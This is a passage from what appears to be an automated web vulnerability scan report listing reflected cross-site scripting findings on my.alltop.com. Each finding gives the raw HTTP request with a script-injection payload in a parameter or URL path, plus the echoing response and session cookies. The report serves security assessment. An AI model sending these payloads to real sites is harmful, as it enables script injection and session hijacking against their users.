X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t58df7"><script>alert(1)</script>67253344f17" method="post" accept-charset="utf-8">
...[SNIP]...

1.209. http://my.alltop.com/alpha/t [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ff91"><script>alert(1)</script>099360783ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t?9ff91"><script>alert(1)</script>099360783ca=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t?9ff91"><script>alert(1)</script>099360783ca=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.210. http://my.alltop.com/alpha/t [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4349"><script>alert(1)</script>aa4e0491774 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3Eb4349"><script>alert(1)</script>aa4e0491774 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3Eb4349"><script>alert(1)</script>aa4e0491774" method="post" accept-charset="utf-8">
...[SNIP]...

1.211. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f57c"><script>alert(1)</script>70956bbe484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t'%22--%3E%3C3f57c"><script>alert(1)</script>70956bbe484/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t'%22--%3E%3C3f57c"><script>alert(1)</script>70956bbe484/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.212. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57a28"><script>alert(1)</script>a5935c4f1f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t'%22--%3E%3C/style%3E%3C57a28"><script>alert(1)</script>a5935c4f1f1/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:24 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:24 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t'%22--%3E%3C/style%3E%3C57a28"><script>alert(1)</script>a5935c4f1f1/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.213. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ae31"><script>alert(1)</script>bae7195bc8d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C3ae31"><script>alert(1)</script>bae7195bc8d/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:24 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:24 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:24 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C3ae31"><script>alert(1)</script>bae7195bc8d/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.214. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa1b4"><script>alert(1)</script>3dc9074be73 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3Eaa1b4"><script>alert(1)</script>3dc9074be73 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:25 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:25 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:25 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3Eaa1b4"><script>alert(1)</script>3dc9074be73" method="post" accept-charset="utf-8">
...[SNIP]...

1.215. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46829"><script>alert(1)</script>dd25f4cd100 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E?46829"><script>alert(1)</script>dd25f4cd100=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:20 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E?46829"><script>alert(1)</script>dd25f4cd100=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.216. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%22ns=%22netsparker(0x00021A)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c88"><script>alert(1)</script>f32a66e6908 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t91c88"><script>alert(1)</script>f32a66e6908/%22ns=%22netsparker(0x00021A) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:19 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

